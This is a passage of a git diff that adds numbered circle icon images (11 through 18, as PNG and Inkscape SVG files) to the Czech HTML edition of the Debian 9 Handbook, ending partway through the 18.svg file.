diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/11.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/11.png
new file mode 100644
index 000000000..32b4a0483
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/11.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/11.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/11.svg
new file mode 100644
index 000000000..c95afcc14
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/11.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 22.579206,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141117,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08855,0.08302 -0.17432,0.157723 -0.257325,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/12.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/12.png
new file mode 100644
index 000000000..45fa4892a
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/12.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/12.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/12.svg
new file mode 100644
index 000000000..e3c3fd66c
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/12.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.621199,22.008438 -8.143067,0 0,-1.784668 2.855469,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979492,-1.0708 0.29329,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437179,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827314,0.522958 -1.27002,0.921386 l -1.394531,-1.651855 c 0.249023,-0.226877 0.509114,-0.442698 0.780274,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079101,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319825,-0.1494141 0.581049,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187011,0.6889648 0.32649,0.293305 0.575513,0.650239 0.747071,1.070801 0.177075,0.420583 0.265616,0.893727 0.265625,1.419433 -9e-6,0.47592 -0.08302,0.932463 -0.249024,1.369629 -0.166024,0.431648 -0.392911,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622565,0.830083 -1.004394,1.245117 -0.376309,0.40951 -0.78028,0.827315 -1.211914,1.253418 l -1.460938,1.469238 0,0.116211 4.947266,0 0,2.158203"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/13.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/13.png
new file mode 100644
index 000000000..0b766d3f8
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/13.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/13.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/13.svg
new file mode 100644
index 000000000..35b496914
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/13.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.148054,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.207519,1.137207 -0.132821,0.33204 -0.318205,0.625334 -0.556153,0.879883 -0.232429,0.249031 -0.509121,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979486,0.121751 1.721021,0.420579 2.22461,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290528,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879882,1.170411 -0.392911,0.332031 -0.890958,0.592122 -1.494141,0.780273 -0.597662,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267256,-0.05534 -1.842774,-0.166016 -0.575522,-0.105143 -1.112305,-0.268392 -1.610351,-0.489746 l 0,-2.183105 c 0.249022,0.132815 0.51188,0.249025 0.788574,0.348632 0.276691,0.09961 0.553384,0.185387 0.830078,0.257325 0.27669,0.06641 0.547849,0.116212 0.813477,0.149414 0.271155,0.0332 0.525712,0.04981 0.763671,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315425,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188146,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124512,-0.73877 -7e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.20474 -0.265631,-0.376289 -0.498047,-0.51464 -0.226893,-0.143876 -0.525721,-0.254553 -0.896485,-0.332032 -0.370772,-0.07747 -0.827315,-0.116205 -1.369628,-0.116211 l -0.863282,0 0,-1.801269 0.84668,0 c 0.509111,7e-6 0.93245,-0.04426 1.270019,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406739,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,1e-5 -0.514652,0.02768 -0.747071,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193687,0.07748 -0.373537,0.166026 -0.53955,0.265625 -0.160484,0.09409 -0.307131,0.188161 -0.439942,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484212,-0.329253 0.755371,-0.473145 0.276692,-0.143868 0.575519,-0.26838 0.896485,-0.373535 0.320961,-0.1106647 0.666826,-0.1964393 1.037597,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139969,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/14.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/14.png
new file mode 100644
index 000000000..2e1d73716
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/14.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/14.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/14.svg
new file mode 100644
index 000000000..832f81679
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/14.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.803816,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262862,0.520191 -0.42334,0.780274 l -2.02539,3.071289 2.755859,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/15.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/15.png
new file mode 100644
index 000000000..7d21c66bb
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/15.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/15.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/15.svg
new file mode 100644
index 000000000..830d65439
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/15.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2839"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.761335,14.255508 c 0.520177,8e-6 1.004389,0.08025 1.452637,0.240723 0.448235,0.160489 0.838372,0.395678 1.17041,0.705566 0.332024,0.309903 0.592114,0.697272 0.780274,1.16211 0.188142,0.459315 0.282218,0.987797 0.282226,1.585449 -8e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.20476,0.520184 -0.506355,0.962892 -0.904785,1.328125 -0.398444,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261723,0.290528 -2.02539,0.290528 -0.304366,0 -0.605961,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863282,-0.124512 -0.27116,-0.04981 -0.531251,-0.116211 -0.780273,-0.199219 -0.243491,-0.08301 -0.464845,-0.17985 -0.664063,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672364,0.31543 0.254555,0.09408 0.517413,0.177086 0.788574,0.249024 0.27669,0.06641 0.553383,0.121746 0.830078,0.166015 0.276689,0.03874 0.539547,0.05811 0.788574,0.05811 0.741532,2e-6 1.305985,-0.152179 1.69336,-0.456543 0.387364,-0.309893 0.581048,-0.799639 0.581054,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751464,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320967,0.03874 -0.481446,0.06641 -0.15495,0.02768 -0.304364,0.05811 -0.448242,0.09131 -0.143882,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456543,-6.1840821 6.408203,0 0,2.1748051 -4.183594,0 -0.199218,2.382324 c 0.177079,-0.03873 0.381832,-0.07747 0.614257,-0.116211 0.237952,-0.03873 0.542314,-0.0581 0.913086,-0.05811"
+       id="path2841"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/16.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/16.png
new file mode 100644
index 000000000..ff396af2f
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/16.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/16.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/16.svg
new file mode 100644
index 000000000..24d1eea04
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/16.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 16.428328,16.853653 c -1e-6,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.06641,-0.575514 0.17985,-1.126132 0.340332,-1.651856 0.166015,-0.531241 0.387369,-1.023753 0.664063,-1.477539 0.282224,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431637,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603185,-0.1936727 1.305984,-0.2905151 2.108398,-0.2905274 0.116205,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.13834,0.00555 0.276686,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251783,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210294,-0.04979 -0.434415,-0.08853 -0.672363,-0.116211 -0.232429,-0.03319 -0.467618,-0.04979 -0.705567,-0.0498 -0.747076,1e-5 -1.361333,0.09408 -1.842773,0.282226 -0.48145,0.182627 -0.863285,0.439951 -1.145508,0.771973 -0.28223,0.33204 -0.484215,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.21582,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243487,-0.384596 0.398438,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556152,-0.448242 0.210282,-0.127271 0.445471,-0.22688 0.705566,-0.298828 0.265621,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419434,0.257324 0.420565,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.154939,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282227,1.768066 -0.182625,0.520184 -0.445483,0.962892 -0.788574,1.328125 -0.343106,0.359701 -0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643555,0.282227 -0.59766,0 -1.156579,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.97396,-0.542317 -1.361328,-0.979492 -0.381837,-0.437173 -0.683432,-0.987791 -0.904785,-1.651856 -0.215821,-0.669593 -0.323731,-1.460933 -0.32373,-2.374023 m 4.216796,3.270508 c 0.226883,2e-6 0.431636,-0.0415 0.614258,-0.124512 0.188146,-0.08854 0.348627,-0.218585 0.481446,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.315429,-0.664062 0.07747,-0.265622 0.116205,-0.581051 0.116211,-0.946289 -6e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243495,-0.343094 -0.61703,-0.514643 -1.120605,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.390141,0.229661 -0.539551,0.390137 -0.149417,0.160487 -0.265628,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.315429,0.755371 0.143877,0.221357 0.318193,0.401207 0.52295,0.539551 0.210282,0.138349 0.453771,0.207522 0.730468,0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/17.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/17.png
new file mode 100644
index 000000000..f1ba68a7f
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/17.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/17.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/17.svg
new file mode 100644
index 000000000..7796bd1d7
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/17.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 17.51573,22.008438 4.316406,-9.960937 -5.578125,0 0,-2.1582035 8.367188,0 0,1.6103515 -4.424317,10.508789 -2.681152,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/18.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/18.png
new file mode 100644
index 000000000..df920d025
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/18.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/18.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/18.svg
new file mode 100644
index 000000000..356f207ee
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/18.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
